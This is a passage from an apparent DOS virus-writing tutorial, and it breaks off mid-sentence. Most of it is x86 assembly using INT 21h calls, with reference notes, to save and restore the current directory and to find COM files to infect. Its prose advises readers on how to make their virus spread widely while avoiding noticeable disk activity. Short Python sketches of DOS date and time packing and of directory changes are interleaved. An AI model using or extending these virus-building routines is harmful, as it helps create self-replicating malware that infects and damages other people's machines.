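Python sketch of the shifts and masks implied by the tables. The function names
are made up for this example; the encoders are included only so the decoders
can be checked with a round trip.

```python
def decode_dos_time(t):
    """Return (hours, minutes, seconds) from a packed file time word."""
    return (t >> 11) & 0x1F, (t >> 5) & 0x3F, (t & 0x1F) * 2

def decode_dos_date(d):
    """Return (year, month, day) from a packed file date word."""
    return 1980 + ((d >> 9) & 0x7F), (d >> 5) & 0x0F, d & 0x1F

def encode_dos_time(hours, minutes, seconds):
    """Pack a time; odd seconds are rounded down (2-second resolution)."""
    return (hours << 11) | (minutes << 5) | (seconds // 2)

def encode_dos_date(year, month, day):
    """Pack a date; the year is stored as an offset from 1980."""
    return ((year - 1980) << 9) | (month << 5) | day

stamp_time = encode_dos_time(12, 30, 10)
stamp_date = encode_dos_date(2001, 8, 15)
print(hex(stamp_time), decode_dos_time(stamp_time))
print(hex(stamp_date), decode_dos_date(stamp_date))
```

Note that seconds are stored halved, so an odd second count cannot be
represented and comes back as the even value below it.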
Current Directory Preservation
------------------------------
If you're searching for files outside the directory where your virus was run
from, you must save the old directory and restore it when you're done. To save
it, do the following:
--8<---------------------------------------------------------------------------
Get_Directory:
mov ah, 47h
mov dl, 0
lea si, [bp+offset Orig_Dir]
int 21h
jnc Find_First
jmp Return_Control
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 47h - Get Current Directory
;On entry: AH - 47h
; DL - Drive number (0=default, 1=A, etc.)
; DS:SI - Pointer to a 64-byte buffer
;Returns: AX - Error code, if CF is set
;Error codes: 15 - Invalid drive specified
;Notes: This function returns the full pathname of the current directory,
; excluding the drive designator and initial backslash character, as an
; ASCIIZ string at the memory buffer pointed to by DS:SI.
A 64 byte long buffer must be present to hold the original directory:
--8<---------------------------------------------------------------------------
Orig_Dir db 64 dup (?)
---------------------------------------------------------------------------8<--
Then, before actually restoring the old directory, you must first change to
the root directory and restore from there, since the saved path has no leading
backslash and is therefore relative to the root.
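Why the detour through the root matters can be seen with a toy model of CHDIR
in Python. This is a deliberate simplification (one drive, no "." or ".."
handling) and the function is invented for this example; it only mimics the
rule that a path without a leading backslash is resolved against the current
directory.

```python
def chdir(current, target):
    """Toy CHDIR: a target starting with a backslash is absolute, anything
    else is appended to the current directory."""
    if target.startswith("\\"):
        return target.rstrip("\\") or "\\"
    if not target:
        raise ValueError("path not found")   # stands in for error code 3
    return current.rstrip("\\") + "\\" + target

saved = "GAMES\\DOOM"    # what function 47h would hand back for \GAMES\DOOM
elsewhere = "\\UTILS"    # hypothetical directory the search ended up in

wrong = chdir(elsewhere, saved)               # restoring directly
right = chdir(chdir(elsewhere, "\\"), saved)  # root first, then restore
print(wrong)
print(right)
```

In this model an empty saved path, which is what you get when the original
directory was the root, makes the final call fail, but by then the current
directory is already the root.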
--8<---------------------------------------------------------------------------
ChangeTo_Root:
mov ah, 3Bh
lea dx, [bp+offset Root]
int 21h
jc Restore_DTA
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 3Bh - Change Directory (CHDIR)
;On entry: AH - 3Bh
; DS:DX - Pointer to name of new default directory (ASCIIZ
; string)
;Returns: AX - Error code, if CF is set
;Error Codes: 3 - Path not found
;Notes: This function changes the current directory to the directory whose path
; is specified in the ASCIIZ string at address DS:DX; the string length
; is limited to 64 characters. The path name may include a drive letter.
A buffer containing an ASCIIZ string representing the root is also needed:
--8<---------------------------------------------------------------------------
Root db '\', 0
---------------------------------------------------------------------------8<--
And finally you switch to the original directory (if the original directory is
the root there will be an error since the path won't be valid - this doesn't
matter since we changed to root before):
--8<---------------------------------------------------------------------------
Restore_Directory:
mov ah, 3Bh
lea dx, [bp+offset Orig_Dir]
int 21h
;jc Restore_DTA ;No need, since it's right after
---------------------------------------------------------------------------8<--
If you change drives while searching for files to infect (this will be covered
in a later article) you should also preserve the original drive and then restore
it at the end.
File Search Techniques
----------------------
A runtime virus can infect files located in the current directory, in
subdirectories, maybe only in root, in the PATH and even on different drives.
You must be very careful when writing your search routine, since if you only
infect files in a few places your virus won't spread much, but if you search
for files to infect in every possible place, after the first infections it will
start to take much longer to find new hosts (since most are already infected)
and disk activity might last for long enough to be noticeable. Some of these
techniques are presented below. The others will be presented in a later article.
Find First/Find Next
--------------------
This is used when you want to search for files in the current directory. You
start by searching for the first matching COM file with normal attributes:
--8<---------------------------------------------------------------------------
Find_First:
mov ah, 4Eh
mov cx, 0
lea dx, [bp+offset COM_Mask]
int 21h
jnc Open_File
jmp Return_Control
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 4Eh - Find First Matching File (FIND FIRST)
;On entry: AH - 4Eh
; CX - File attribute
; DS:DX - Pointer to filespec (ASCIIZ string)
;Returns: AX - Error code, if CF is set
;Error codes: 2 - File not found
; 3 - Path not found
; 18 - No more files to be found
;Notes: If CX is 0, the function searches for normal files only. If C